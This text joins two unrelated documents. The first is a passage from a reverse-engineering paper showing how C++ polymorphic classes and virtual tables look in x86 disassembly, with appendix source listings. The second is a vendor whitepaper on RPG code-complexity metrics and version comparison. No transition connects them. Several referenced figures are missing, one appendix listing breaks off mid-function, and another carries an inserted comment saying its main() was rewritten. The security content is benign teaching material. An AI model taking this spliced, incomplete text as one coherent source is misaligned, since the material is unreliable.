The compiled case study presents three shape classes, with a base class called 'Polygon.' The base class has two derived classes called 'Triangle' and 'Rectangle,' which share the base class attributes 'width' and 'height.' They also inherit a virtual function called 'magic,' which simply returns an integer computed from the inherited member variables, with the result depending on which override is invoked. What makes these derived classes polymorphic is the fact that they inherit and override a virtual function (CPlusPlus, n.d.). Figure 23 shows the source code for this program with the three classes discussed.

```
class Polygon {
  protected:
    int width, height;
  public:
    void set_values(int a, int b)
      { width=a; height=b; }
    virtual int magic()
      { return width + height; }
};

class Rectangle: public Polygon {
  public:
    int magic()
      { return width * height; }
};

class Triangle: public Polygon {
  public:
    int magic()
      { return (width - height); }
};
```

Figure 23: C++ Code Defining Three Classes

Within the main component of the program, we initialize three objects: rect, trgl, and poly. We then define three pointers to Polygon and assign each the address of one of these objects (CPlusPlus, n.d.). The assignments and initializations are depicted in Figure 24.

```
int main () {
  Rectangle rect;
  Triangle trgl;
  Polygon poly;
  Polygon * rectangle = &rect;
  Polygon * triangle = &trgl;
  Polygon * polygon = &poly;
  rectangle->set_values (10,6);
  triangle->set_values (7,5);
  polygon->set_values (4,5);
```

Figure 24: Assignments Made to Base and Derived Classes

At the assembly level, one can cross reference each setup and initialization of our objects with the different respective subroutines. Figure 25 demonstrates the three pointers to Polygon as they are being set up. Note once again, we see the address being loaded into the ECX register, in line with the thiscall convention.

```
lea ecx, [ebp+var_20] ; load address of variable
call sub_401130 ; sub to define attributes of object
lea ecx, [ebp+var_C]
call sub_401150
lea ecx, [ebp+var_30]
call sub_401170
```

Figure 25: x86 Initialization of Classes

By tracing into the top most subroutine, it can clearly be seen that the function override takes place for the derived class in Figure 26.

```
f_initialize_derived_class_1 proc near
ptr_object= dword ptr -4

push ebp
mov ebp, esp
push ecx
mov [ebp+ptr_object], ecx
mov ecx, [ebp+ptr_object] ; pointer to object
call f_initialize_base_class ; must define base class
mov eax, [ebp+ptr_object]
; pointer at start of object is overridden with offset to new function
mov dword ptr [eax], offset off_40215C ; derived class's virtual function
mov eax, [ebp+ptr_object]
mov esp, ebp
pop ebp
retn
f_initialize_derived_class_1 endp
```

Figure 26: Initialization of Derived Class

Within this subroutine two main things happen. First, the pointer to the derived class object is stored in ECX, and a subroutine is called which defines the base class. Next, that same object is loaded, and the address is overridden to point to a new offset, the address of the derived class's virtual function. Without the benefit of source code one can still make this assumption, because upon stepping into the function `f_initialize_base_class`, one sees very much the same behavior as compared to the caller.
```
f_initialize_base_class proc near
ptr_object= dword ptr -4

push ebp
mov ebp, esp
push ecx
mov [ebp+ptr_object], ecx
mov eax, [ebp+ptr_object] ; move address of object to eax
; dereference eax and set to virtual function offset
mov dword ptr [eax], offset off_402154
mov eax, [ebp+ptr_object]
mov esp, ebp
pop ebp
ret
f_initialize_base_class endp
```

Figure 27: Setup for Base Class Object

As seen in Figure 27, the object pointer is again loaded and dereferenced in order to store the offset to a virtual function at the virtual memory address 0x402154. However, once this function has completed, the same address at [eax] is dereferenced again and pointed to a new virtual function address in Figure 26. The base class definition from Figure 27 is overridden, and the derived class's virtual function at `off_40215C` is used instead.

In Figure 28, we take this knowledge, combined with our applied annotations and function names thus far, and go back to IDA where the objects were being initialized. It should now be obvious which of the subroutines initializes our Polygon base class and which two are derived.

```
lea ecx, [ebp+var_20] ; load address of variable
call f_initialize_derived_class_1 ; sub to define attributes of object
lea ecx, [ebp+var_2C]
call f_initialize_derived_class_2
lea ecx, [ebp+var_30]
call f_initialize_base_class
```

Figure 28: Applying Definition of Class Types

Continuing onward through the flow of execution in Figure 29, next are the three separate calls to the `set_values` function. At the x86 level this is called in a very similar fashion to how it is observed in the original source code.
<table> <thead> <tr> <th>X86 Disassembly</th> </tr> </thead> <tbody> <tr> <td>push 6</td> </tr> <tr> <td>push 10</td> </tr> <tr> <td>mov ecx, [ebp+var_14]</td> </tr> <tr> <td>call sub_401000</td> </tr> <tr> <td>push 5</td> </tr> <tr> <td>push 7</td> </tr> <tr> <td>mov ecx, [ebp+var_10]</td> </tr> <tr> <td>call sub_401000</td> </tr> <tr> <td>push 5</td> </tr> <tr> <td>push 4</td> </tr> <tr> <td>mov ecx, [ebp+var_24]</td> </tr> <tr> <td>call sub_401000</td> </tr> </tbody> </table> <table> <thead> <tr> <th>C++ Source Code</th> </tr> </thead> <tbody> <tr> <td>rectangle-&gt;set_values (10,6);</td> </tr> <tr> <td>triangle-&gt;set_values (7,5);</td> </tr> <tr> <td>polygon-&gt;set_values (4,5);</td> </tr> </tbody> </table> **Figure 29: Comparative Analysis of Code When set_values is Called** Within the subroutine called above, one can start to build a structure depiction based on the base class. The figure below contains annotations depicting this in greater detail. It is important to note that the starting offset for our structure was defined earlier, when our object was being initialized; the remaining offsets, +4 and +8 respectively, are set here to two separate integers. This is known because the caller's arguments, when pushed to the stack, were exposed as such in Figure 30. After considering the information thus far, one can define the following structure using IDA in Figure 31.
```assembly
; int __stdcall f_set_values(int int_1, int int_2)
f_set_values proc near
ptr_object= dword ptr -4
int_1= dword ptr 8
int_2= dword ptr 0Ch

push ebp
mov ebp, esp
push ecx
mov [ebp+ptr_object], ecx
mov eax, [ebp+ptr_object]
mov ecx, [ebp+int_1]
mov [eax+4], ecx ; structure member set to int value
mov edx, [ebp+ptr_object]
mov eax, [ebp+int_2]
mov [edx+8], eax ; structure member set to int value
mov esp, ebp
pop ebp
ret 8
f_set_values endp
```

Figure 30: Assigning Class Member Variables

Figure 31: Structure Definition for Class Objects

At the assembly level, the virtual functions are called by referencing the object pointer for the class type and moving the first element of that class into a register that is later dereferenced and called into directly, like any other function. Interestingly, one can see from Figure 32 that the thiscall convention operation of moving the object to ECX is done separately from the task of setting up the EAX register for the eventual call into the virtual function. By leveraging earlier analysis concerning how the classes were initialized, it should be clear precisely which one of the three virtual functions is chosen to be executed. Concerning the case from above, one can observe the initial offset of the structure to be pointing to the virtual function for the base class at `off_402154`. However, immediately following that, the same offset was overridden to be a pointer to `off_40215C`. Figure 33 shows the virtual table that contains the three functions.
If any class has virtual methods, the compiler creates a sequence of pointer entries in a table to those methods (Skochinsky, 2011). Each entry is annotated below to point out how it fits into the overall picture.

```
off_402154 dd offset virtual_base_class_function ; DATA XREF: f_initialize_base_class+8
off_40215C dd offset unk_40228C
off_402164 dd offset virtual_derived_class_function_1 ; DATA XREF: f_initialize_derived_class_1+12
off_402170 dd offset unk_402270
off_402178 dd offset virtual_derived_class_function_2 ; DATA XREF: f_initialize_derived_class_2+12
```

Figure 33: Table of Pointer Entries to Virtual Functions

Figure 34 steps into the subroutine of the base class. From within the base class, the object retrieved from the 'this' pointer is used to access member variables, perform some basic arithmetic, and return an integer.

3. Conclusion

The outlined case studies illustrated common object oriented concepts with the intent of providing the reader with real examples encountered when reverse engineering C++. Reviewing calling conventions, inferring the context of register contents based on assembly code, and following the flow of execution allow one to make informed observations about what a data structure or class ultimately represents. When these conclusions are applied to the broader project, they have an amplifying effect on the completeness of the reversing effort. Understanding the application of object oriented programming concepts, such as data structures, standard classes, and polymorphic classes, and how they are represented in x86 assembly, is an essential skill for the reverse engineer to meet today's challenges. While these concepts may be challenging for the uninitiated, a grasp of object oriented principles greatly simplifies the reversing process. When tasked with reverse engineering modern malware, it is a mandatory skill to possess.

4. References

5. Appendix

5.1.
Data Structures Source Code

The following source code was used to create the example used in the first case study presented on data structures:

```cpp
/*
Jason Batchelor
Reverse Engineering
04/13/2014
Rationale: Program for illustrating objects and structures.
*/

#pragma comment(lib, "wininet.lib")

#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include <cstring>

using namespace std;

struct InternetConnection
{
    HINTERNET Connect;
    HINTERNET OpenAddress;
    LPCTSTR Useragent;
    LPCTSTR Uri;
    char DataReceived[4096];
    DWORD NumberOfBytesRead;
    DWORD TotalNumberRead;
};

int GetHTML(InternetConnection &conn)
{
    conn.TotalNumberRead = 0;
    conn.Useragent = "Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0 ";
    conn.Uri = "http://www.nhl.com";
    conn.Connect = InternetOpen(conn.Useragent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (!conn.Connect) {
        printf("Connection Failed or Syntax error\n");
        return 0;
    }
    conn.OpenAddress = InternetOpenUrl(conn.Connect, conn.Uri, NULL, 0,
        INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_KEEP_CONNECTION, 0);
    if (!conn.OpenAddress)
```

5.2. Standard Classes Source Code

The following code was used to compile the second presented case study on standard classes:

```cpp
#include <iostream>
using namespace std;

class Square
{
    int width, height;
public:
    void set_values(int, int);
    int area() { return width*height; }
};

void Square::set_values(int x, int y)
{
    width = x;
    height = y;
}
```

5.3. Polymorphic Classes Source Code

The following source code was used to illustrate the third case study on polymorphic classes, and their representation in x86:

```cpp
/*
Jason Batchelor
Reverse Engineering
07/21/2015
Rationale: Program for illustrating virtual tables.
*/
#include <iostream>
#include <cstdio>
using namespace std;

class Polygon {
  protected:
    int width, height;
  public:
    void set_values(int a, int b) {
        width = a;
        height = b;
    }
    virtual int magic() {
        return width + height;
    }
};

class Rectangle : public Polygon {
  public:
    int magic() {
        return width * height;
    }
};

class Triangle : public Polygon {
  public:
    int magic() {
        return (width - height);
    }
};

int main() {
    Rectangle rect;
    Triangle trgl;
    Polygon poly;
    // The extracted listing exercised a Square object from the previous
    // appendix, which is not defined here; driving the polymorphic classes
    // through a base-class pointer keeps this listing self-contained and
    // actually demonstrates virtual dispatch.
    Polygon *shape = &rect;
    shape->set_values(3, 4);
    printf("Magic: %d\n", shape->magic());
    shape = &trgl;
    shape->set_values(3, 4);
    printf("Magic: %d\n", shape->magic());
    return 0;
}
```

5.4. Compiler Options

All of the case study examples were compiled using the following settings. To produce a binary similar to what was reviewed in this paper, please ensure the settings below are applied.

5.4.1. Optimization Settings for Microsoft Visual Studio 2010

![Optimization Settings for Microsoft Visual Studio 2010](image)

5.4.2. Compiler Flags

```
/Fp"Release\[project name].pch" /Fa"Release\" /Fo"Release\" /Fd"Release\vc100.pdb" /Gd /analyze- /errorReport:queue
```
Complexity Metrics and Difference Analysis for better Application Management

# Table of Contents

- Executive Summary
- Concepts
  - The Science Behind Software Maintenance
  - Why Audit and Metric Capabilities are Critical for Managing Legacy Applications
- Overview
  - Aspects of Quality in Software Maintenance
  - Translating Quality Into Measurable Items
  - How Measurable Items Become Actionable
  - Uses of Historical and Time Series Information
  - Version Comparison
  - Testability
- Use Cases for Metrics Reporting and Difference Analysis
  - Find the Most Complex Code in My System
  - Reducing Size of Application and Maintenance Workload by Removing Unnecessary Code
  - Improving Project Management through Better Information
  - Cleaning Up your System to Recompile in its Entirety
  - Targeting Top 1% of Code that makes your Job Difficult
  - Finding Programs most likely to Produce Defects when Modified
  - Identifying Unseen Risk in your Application
  - Monitoring Changes in Program Complexity to preserve System Value & Extend its Life
  - Analyzing Metrics Time Series Data for Changes in System Complexity
  - Analyzing Differences in Source Code and System Objects in different Versions

**Executive Summary**

The most challenging task in IT programming is maintaining and enhancing existing applications. This in fact represents the majority of worldwide programming budgets. Unlike new software development, maintenance work is significantly impacted by the characteristics of the software being modified. Modifying existing code can be exceptionally difficult and prone to cost overruns, delays and defects. This paper discusses how you can improve your maintenance results by gaining quantifiable, measurable insights into your existing application. You can get significant information for these kinds of questions:

- How difficult will it be to modify this program?
- This program is very complex to modify; should we look for an alternative design?
- How difficult will it be to test this program if we modify it?
- Where are there risks that my programmers are not seeing?
- Do my programmers' estimates line up with the complexity of the programs?
- Is this program too complex to give to a junior programmer?
- The system is becoming more and more complicated; what's the best approach to simplifying it? Where do we start?

Many System i applications exceed a million lines of code. Over the span of their lifetime these systems become more and more complex, seriously and adversely impacting IT software projects and business objectives. This paper discusses how to measure that complexity so you can act on it to lower your costs, increase your throughput and improve your quality.

"You cannot manage what you do not measure." - Bill Hewlett, Hewlett-Packard

The ISO Software Quality Model, defined in 1996 under ISO 9126 and updated in 2005 under ISO 2500n, defines the means to measure the quality of a software application with six main quality characteristics:

- Functionality
- Reliability
- Usability
- Efficiency
- Maintainability
- Portability

Of particular importance to managers of legacy applications is the characteristic called "Maintainability", which can be broadly defined as the ability to make changes for improving functionality, improving performance, meeting compliance requirements or fixing defects. The Model defines four sub-characteristics that describe in more detail how maintainable a software system is:

- Maintainability
  - Analyzability – the ability to locate and scope features or faults within the code
  - Changeability – the effort required to make changes to the software
  - Stability – the likelihood that changes to the software will result in defects
  - Testability – the effort required to test changes to the software

Independently of project specifics, these characteristics of the software work in concert with programmers' skills and their tools to determine how well the IT organization performs its role of supporting and enhancing applications.
The primary factors in the success or failure of software maintenance tasks are the programmers' skills, their tools and the traits of the software being maintained.

**The Human Factor**

"It is harder to read a program than to write it." This familiar-sounding adage sounds suspiciously like folk wisdom, but in fact there is serious science behind it. For nearly 20 years the *IEEE International Conference on Program Comprehension* has been meeting to research and discuss the challenges of maintaining software applications. Two of the key topics in this subject area are:

- The mental processes people use to understand software
- The characteristics of software that make it easy or difficult to understand

The ISO Software Quality Model described above addresses the second of those points by stating that critical aspects of software quality are its analyzability, changeability, stability and testability. While all of these characteristics ultimately involve the mental processes of people, they also lead to the hope that they can be measured in themselves and thus fit into a quality management program, which in turn should lead to increased productivity, programming throughput and higher quality.

How, then, can one measure analyzability? There is no doubt that there are certain programs that, upon a little examination, lead one to quickly say, "This is very complicated. I do not want to maintain this program!" An experienced programmer may look at a program and come to that conclusion in less than 60 seconds. *How does a programmer quickly assess the analyzability of a program?* That programmer is making a quick judgment on how much effort is required to build mental models of control flow and data flow sufficiently complete and accurate to make software changes with an appropriate degree of confidence.
**What did the programmer look at to make that judgment?**

**The Software Factor**

Over the past four decades a number of formulas and models have been developed that attempt to measure the complexity of software by analyzing the source code. If these measurements are successful then they will give us a good understanding of all those maintainability characteristics.

**What do these complexity models measure?**

Essentially they measure the things that are used in the mental processes and tasks of a programmer who is trying to understand a program:

- Build a mental model of the control flow of the program; i.e., the sequence of events and their conditioning.
- Build a mental model of the data flow of the program; i.e., what data goes in, how it's transformed, and what goes out.
- Map real world actions to actions observed in the code; e.g., "this is where we give a discount to frequent customers".
- Engage in "feature location", whereby the programmer is trying to find the code that implements features that are relevant to the modification task.
- Create and test out code modification hypotheses; i.e., "design" and "impact analysis".
- Utilize "beacons" to do all of the above; i.e., scan code and comments for keywords that signify relevance; e.g., a subroutine named WRITExxx probably outputs some data.
- Utilize "chunking" to gradually aggregate understanding of small pieces of code into larger and larger pieces.

Some of these processes are more measurable than others:

**Control Flow** – the actual control flow of a program is determined by control operations such as IF, DO, ELSE, etc., as well as the sequence of statements. If we can measure the number and complexity of control flow statements, plus the overall number of statements, we can gain some insight into how challenging the task is to learn a given program for the purpose of modifying it.
**Data Flow** – the data flow of a program is determined by the files that are input, the fields that are transformed and the files that are output. If we can measure the number and complexity of such fields we can gain some insight into how challenging the task is to learn a given program for the purpose of modifying it.

**Map real world actions, feature location and beacons** – you may wonder how on earth these things could be measured, but in fact there are some indicators we can use. Researchers have shown many times that well placed, well written comments and informatively named program tokens can greatly improve program comprehension.

**Chunking** – code that is well organized and structured into loosely coupled, cohesive, visually distinct blocks is easier to mentally aggregate and comprehend than piles of spaghetti code.

Databorough's X-Audit tool provides metrics for many of these characteristics, as this paper describes in detail.

---

**Why Audit and Metric Capabilities are Critical for Managing Legacy Applications**

Consider these two facts:

- 75% of worldwide IT programming budgets are dedicated to maintaining and enhancing existing software applications (Forrester Group)
- 40-60% of maintenance programmers' time is spent simply trying to understand the code they are working on (Software Engineering Book of Knowledge)

If you put those two facts together you come to the conclusion that the single most expensive task in all of IT programming is programmers trying to understand code.
**What are the impacts on IT and businesses of this maintenance challenge?**

- **Costs are high:** it is more expensive to deliver a given amount of functionality to the business if it must be part of an existing application than if it is a new application
- **Expenses diverted to the old rather than the new:** the bulk of IT programming budgets go to maintaining existing applications rather than developing new applications that could more quickly provide competitive advantages
- **Business opportunities missed:** new business opportunities are missed or delayed because IT cannot respond quickly or cost-effectively enough to enhance existing systems to support new business opportunities
- **Operational and financial risks:** changing highly complex, existing systems can introduce production defects that pose operational or financial risks
- **Threat of non-compliance:** the business risks not meeting regulatory requirements in a timely manner if systems cannot be enhanced quickly enough

**Why is it difficult to understand existing code?**

At a very basic level there are two things involved: the programmer and the code. Programmers may be under-equipped, for whatever reason, to do the job, and that makes it difficult for them. Or the code is in fact very complicated, and somewhat defiant of human comprehension.

**What can be done to improve maintenance value delivery?**

In his book examining over 12,000 software projects and their critical success and failure factors, *Applied Software Measurement: Global Analysis of Productivity and Quality*, long-time software metrics guru Capers Jones provides some insightful numbers from his analysis of maintenance productivity and quality. The following table shows factors that positively impact maintenance productivity, and factors that negatively impact it.
<table>
<thead>
<tr> <th>Positive Factors</th> <th>Impact%</th> <th>Negative Factors</th> <th>Impact%</th> </tr>
</thead>
<tbody>
<tr> <td>Staff are maintenance specialists</td> <td>+35</td> <td>Error-prone code</td> <td>-50</td> </tr>
<tr> <td>High staff application experience</td> <td>+34</td> <td>Embedded variables, data</td> <td>-45</td> </tr>
<tr> <td>Table driven variables</td> <td>+33</td> <td>Low staff experience</td> <td>-40</td> </tr>
<tr> <td>Low complexity code</td> <td>+32</td> <td>High complexity code</td> <td>-30</td> </tr>
<tr> <td>Static analysis tools</td> <td>+30</td> <td>No static analysis tools</td> <td>-28</td> </tr>
<tr> <td>Code Re-factoring tools</td> <td>+29</td> <td>Manual change control</td> <td>-27</td> </tr>
<tr> <td>Complexity analysis tools</td> <td>+20</td> <td>No defect tracking tools</td> <td>-22</td> </tr>
<tr> <td>Automated change control</td> <td>+18</td> <td>No quality measurements</td> <td>-18</td> </tr>
<tr> <td>Quality measurements</td> <td>+16</td> <td>Management inexperience</td> <td>-15</td> </tr>
<tr> <td>Formal code inspections</td> <td>+15</td> <td>No code inspections</td> <td>-15</td> </tr>
<tr> <td>Regression test libraries</td> <td>+15</td> <td>No annual training</td> <td>-10</td> </tr>
</tbody>
</table>

Like many such analyses, some of the good and bad factors are just the flip side of each other, but here is what stands out and should be heeded by the thoughtful IT manager:

The dominant factors that affect maintenance productivity, costs and quality, both good and bad, are related to the complexity and quality of the code, and the tools available to deal with them.

Here is another view of that table highlighting the relevant factors, and the solutions that Databorough delivers to directly address those factors.
<table> <thead> <tr> <th>Positive Factors</th> <th>Impact%</th> <th>Negative Factors</th> <th>Impact%</th> </tr> </thead> <tbody> <tr> <td>Maintenance specialists</td> <td>+35</td> <td>Error-prone code (X-Audit)</td> <td>-50</td> </tr> <tr> <td>High staff experience</td> <td>+34</td> <td>Embedded variables (X-Analysis)</td> <td>-45</td> </tr> <tr> <td>Table driven variables (X-Analysis)</td> <td>+33</td> <td>Low staff experience</td> <td>-40</td> </tr> <tr> <td>Low complexity code (X-Audit)</td> <td>+32</td> <td>High complexity code (X-Audit)</td> <td>-30</td> </tr> <tr> <td>Static analysis tools (X-Analysis)</td> <td>+30</td> <td>No static analysis tools (X-Analysis)</td> <td>-28</td> </tr> <tr> <td>Code Re-factoring tools (X-Redo)</td> <td>+29</td> <td>Manual change control</td> <td>-27</td> </tr> <tr> <td>Complexity analysis tools (X-Redo)</td> <td>+20</td> <td>No defect tracking tools</td> <td>-22</td> </tr> <tr> <td>Automated change control</td> <td>+18</td> <td>No quality measurements</td> <td>-18</td> </tr> <tr> <td>Quality measurements</td> <td>+16</td> <td>Management inexperience</td> <td>-15</td> </tr> <tr> <td>Formal code inspections</td> <td>+15</td> <td>No code inspections</td> <td>-15</td> </tr> <tr> <td>Regression test libraries</td> <td>+15</td> <td>No annual training</td> <td>-10</td> </tr> </tbody> </table> How can you start achieving these kinds of gains in productivity and quality? Very simply, you need better information for management and better information for programming. Databorough supplies two essential tools to improve productivity and quality for maintenance operations that directly address the above statistics as found in over 12,000 software projects: **X-Analysis** – An application cross reference and static analysis tool that enables managers, systems analysts and programmers to rapidly and thoroughly research existing applications in support of application enhancement, debugging and documentation tasks. 
**X-Audit** – the focus of this paper – is a source code and object analysis system that provides metrics, alerts and time series comparisons of the state of your application, to enable you to focus attention on the areas of your system most in need of correction, improvement or attention.

With this information available you can begin to answer some truly important questions:

- How can I find the most complex code in my applications?
- Can I reduce the size of my applications, and thereby the maintenance workload, by removing unnecessary code?
- How can I improve my project management, estimating, scheduling, budgeting, testing, etc., through the use of this information?
- How can I clean up my applications so they will recompile in their entirety?
- Is there a way to target the top 1% of my code that makes our job the most difficult?

See the sections on Popular Use Cases for more examples and detailed information.

**Overview**

**Aspects of Quality in Software Maintenance**

As the earlier section, The Science Behind Software Maintenance, describes, the ISO Software Quality Model breaks down software quality into six characteristics, one of which we are most concerned with as managers of legacy systems (shown here broken down further):

- Functionality
- Reliability
- Usability
- Efficiency
- Maintainability
  - Analyzability – the ability to locate and scope features or faults within the code
  - Changeability – the effort required to make changes to the software
  - Stability – the likelihood that changes to the software will result in defects
  - Testability – the effort required to test changes to the software
- Portability

In this paper we are specifically concerned with software maintenance and how we can obtain useful quality information by analyzing source code and other system information. Even more specifically, we are concerned with how we can quantify that information by casting it into a framework of metrics.
But let's first look in another direction and think about another set of ISO standards: those that pertain to software maintenance. ISO 14764, Software Life Cycle Processes for Maintenance, describes four categories of maintenance activities:

- Corrective – fix defects
- Adaptive – modify the software to keep it useful, i.e. enhancements
- Perfective – improve either the performance or maintainability of the software
- Preventive – preemptively detect or correct latent defects in the software

Various studies have shown that upwards of 80% of total activity is adaptive; in other words, enhancements to the system. There is sometimes a view that most of the work is corrective, but it has also been shown that many tasks presented by users as bug fixes are in fact requests for changes in functionality. Many maintenance organizations do not fully distinguish between corrective and adaptive activities and often switch staff freely between these types of tasks.

**Key Principle: All Software Quality Declines Over Time**

However the work is categorized and managed, over time the quality of the software goes down. In fact, unless actions are taken to correct it, it is completely unavoidable that the quality of the software declines over time:

- If the software is maintained without full regard to maintainability it will necessarily become more complex, and thus its maintainability quality will decline, or
- If the software is not maintained it will necessarily become less useful to the evolving user organization, and thus its functionality quality will diminish

**The Inevitability of Decline**

The evolution of software systems over time has been studied by a number of researchers and academics. Professor Meir Lehman of Imperial College London identified a number of observations of how software evolves over time in what is often called The Eight Laws of Software Evolution.
For the IT manager with a big picture of the forces at work in software maintenance, it is worth having some awareness of these forces:

1. Continuing change – software must be continually adapted or it will become less and less satisfactory
2. Increasing complexity – as software is changed it becomes increasingly complex unless work is done to mitigate the complexity
3. Relationship to organization – the software exists within a framework of people, management, rules and goals which create a system of checks and balances that shape software evolution
4. Invariant work rate – over the lifetime of a system the amount of work performed on it is essentially the same, as external factors beyond anyone's control drive the evolution
5. Conservation of familiarity – developers and users of the software must maintain mastery of its content in order to use and evolve it; excessive growth reduces mastery and acts as a brake
6. Continuing growth – seemingly similar to the first law, this observation states that additional growth is also driven by the resource constraints that restricted the original scope of the system
7. Declining quality – the quality of the software will decline unless steps are taken to keep it in accord with operational changes
8. Feedback system – the evolution in functionality and complexity of software is governed by a multi-loop, multilevel, multiparty feedback system

Why is this important, and how is it useful? The job of most IT managers is typically to get it done faster, better, cheaper ("pick two," as the saying goes). Often unstated is the further directive to continually improve on those measurements: not just today, but next year, and the year after. But implicit in all of the above is that much of what you do today will slow you down tomorrow. Unless, that is, you take action on the implicit advice of the second law and do work to maintain your system's maintainability.
And indeed, many IT organizations with a long view of the life of their software and its responsiveness to business needs take proactive steps to maintain maintainability and manage to maintainability. But how is that possible? How do you undertake a program of maintaining maintainability and managing to maintainability? For that, we return to the wisdom of Bill Hewlett: "You cannot manage what you do not measure."

**Translating Quality Into Measurable Items**

Again, this paper concerns itself with the aspects of quality that can be measured by analyzing source code and other system information. What aspects of quality cannot be measured this way? We cannot, for example, measure how well the system functionality meets business needs, since we have no way in the system to measure business needs. We can also do very little to measure system reliability – though we could perhaps measure system availability, measuring defects calls for a tool designed for that purpose.

What can we measure by looking at the source code and system objects? As mentioned earlier, there are some key mental processes that programmers engage in when performing maintenance. If we can measure things that relate to these processes we will get some understanding of the level of maintainability quality:

**Control Flow** – what conditions control the program's operations and what is their sequence?

**Data Flow** – what are the files and fields that are input, how are they transformed, how are they output?

**Map real world actions, feature location and beacons** – what is the quality of names assigned to program tokens and the level of commenting?

**Chunking** – to what degree is the code loosely coupled, cohesive and readable?

If these are the mental processes that impact maintainability, what can be measured for them?
Looking at this in strictly RPG terms we can define a number of aspects of the source code that can help us measure these characteristics:

**RPG Metrics that indicate comprehensibility of Control Flow**
- Cyclomatic complexity – basically a count of IFs, DOs, FORs, WHENs, etc.
- Greatest depth of nested ELSEs
- Number of GOTOs or CABxxs
- Greatest depth of nested IF/DOs
- Greatest number of statements in an IF/DO block
- Greatest depth of loops within loops
- Greatest number of statements in a subroutine
- Depth of subroutine calls
- Uses RPG Cycle for processing
- Number of statements with conditioning indicators
- Decision density
- Number of delocalizing statements

**RPG Metrics that indicate comprehensibility of Data Flow**
- Halstead volume – basically a measure of the number of distinct fields and their uses
- Number of database files
- Number of device files
- Number of EXFMTs/READs to display files
- Number of display file formats with fields that output to a database file
- Number of subfiles in program
- Number of called programs

Complexity Metrics & Difference Analysis for better Application Management

- Number of calling programs
- Number of fields whose value was set
- Number of fields whose value was used
- Number of global fields whose value was set
- Number of global fields whose value was used
- Number of files updated
- Number of program-described input files
- Number of program-described output files
- Number of applicable OVRDBFs
- Number of applicable OPNQRYF statements
- Average variable span by line numbers
- Total variable span by line numbers
- Average variable span by subroutine count
- Total variable span by subroutine count
- Number of delocalizing statements

**RPG Metrics that indicate comprehensibility through Knowledge Mappability**
- Number of non-hyper-local field names of less than x characters
- Number of lines of comments

**RPG Metrics that indicate comprehensibility through Chunkability**
- Number of actual lines of code
- Number of actual lines of comments
- Greatest number of statements in a subroutine
- Greatest number of statements in an IF/DO block
- Number of implicit global parameters in a procedure
- Number of delocalizing statements
- Maintainability index – a formula developed by HP through experience
- Number of /COPY members
- Number of statements changed/added in the last 30-60-90-180-360 days
- Number of months in the last 12 months that had one or more statements added/changed

Some of these metrics are useful in more than one category and some do not fit neatly into these categories or are not perfect indicators, but nevertheless, it should be clear that there are in fact a number of useful metrics for understanding maintainability and overall program complexity. It should also be clear that these metrics can be computed from typical source code; indeed, that is precisely what Databorough's X-Audit tool delivers.

If you are an experienced programmer who is managing a large application, you may look at this list and nod your head in recognition that many of these things would be interesting to have in a sortable list. But the real question is, *how can these metrics make a meaningful difference?*

"What gets measured is what gets done." - Tom Peters

The following diagram shows the two primary ways in which software metrics can help manage a software maintenance operation. The left box is meant to show that metrics information can be used to bring better management and planning to your software projects. Some of the ways this information can be used are:

- Adjust programming estimates, and therefore schedules and costs
- Decide where more thorough analysis is necessary
- Decide which resources are most appropriate for a task
- Develop more appropriate and detailed testing plans
- Advise the business of additional project risks
- Decide on alternative design plans to minimize changes to highly complex code

For more information on how to use metrics for these purposes see the use case *Improving Project Management Through Better Information*.

The right box is meant to show that metrics information can be used to help you keep your software in a more maintainable state and thus preserve its long-term value and ability to respond to business needs quickly and cost-effectively. This type of work can be analyzed in a couple of ways, leading to tasks that:

- Refactor programs that cross a certain threshold of complexity, or,
- Refactor programs that have shown a large increase in complexity and are expected to continue to do so

For more information on maintaining maintainability see the following use cases:

- Monitoring changes in program complexity to preserve system value and extend its useful life
- Targeting the top 1% of code that makes your job difficult
- Finding programs most likely to produce defects when modified
- Identifying unseen risks in your application
- Cleaning up your system so it will recompile in its entirety

**Uses of Historical and Time Series Information**

The metrics discussed so far have been point-in-time metrics, in that they analyze source code and system objects at the time the metrics data is generated. For overall system management there are other useful perspectives that involve the dimension of time and change. One important perspective comes from understanding the change in the complexity and maintainability of your system over time: in this case metrics data collected at two or more different points in time are compared and the differences are shown.
Some of the purposes of this sort of analysis are:

- Determine the overall success of maintaining maintainability
- Identify programs that cross a defined threshold of maintainability into unmaintainability and are thus candidates for refactoring
- Identify programs with sudden changes in complexity that are forecast to continue with that trend, and are thus candidates for refactoring or other attempts to keep them maintainable
- Identify increases in complexity where they were not expected, as a possible indication of poor programming or design

See the use case Analyzing Metrics Time Series Data for Changes in System Complexity for more information.

**Version Comparison**

Version comparison is a facility that enables you to compare two different versions of your application at both the source code and object levels. Here are a few common scenarios where this is useful:

- Compare a version of the application in use in one location to the version in use at another location
- Compare a new version of a packaged product release to the version currently installed in order to understand the differences
- Compare the current state of the application to the state it was in at a point in time in the past

**Difference Analysis**

A product such as Databorough's X-Audit can do these comparisons and give detailed reports on both source and object differences between the versions. This information can point to changes that have to be made to bring two versions into harmony, or to integrate a new version of the source. By comparing versions from different points in time the analysis can reveal unexpected changes in the system in the interim.
Information contained in such an analysis includes:

- Files and programs that have been added, changed or deleted
- Fields whose attributes have changed
- Changes in database relationships and dependencies
- Business rules that have been changed, added or deleted
- Source statements that have been changed, added or deleted

**Source Comparison**

The last type of analysis in the above list can become very involved, as potentially many source members may have been changed. It is important that a facility be available to quickly drill down from a changed source member to the specific lines of code that have been changed, added or deleted. A source comparison tool is essential for analyzing the differences in source code between the versions being compared. A good tool should show you:

- Which source members have been changed, and allow you to drill down into:
- Which source statements have been changed, added or deleted

Here is an example of a source comparison; in this case two H specification statements exist in the left-hand version which do not exist in the right-hand version:

![Source Comparison Example](image)

**PTF Analysis – A Special Case of Version Comparison**

If you are using a packaged software application that you have customized to meet your needs then you will probably have encountered the challenges that come when the vendor provides a new release of the product. How do you integrate your past changes with the new version of the software? What have you changed? What have they changed? This is in fact a serious challenge and potentially a great deal of analysis work. The following diagram depicts this situation. In this case an analysis of the source and objects in the new release of a packaged software product (bottom) is compared against the source and objects that have been customized in the past (middle) and the current base installation of the package (top).
This sort of analysis can be quite labor intensive, but the use of a tool like Databorough's X-Audit PTF Analysis can save a great deal of time and prevent the risk of mistakes. The following types of conditions are analyzed and reported on. In these examples "PTF library" refers to the new release of package changes and "customized library" refers to the customizations that have been made over time to the base package.
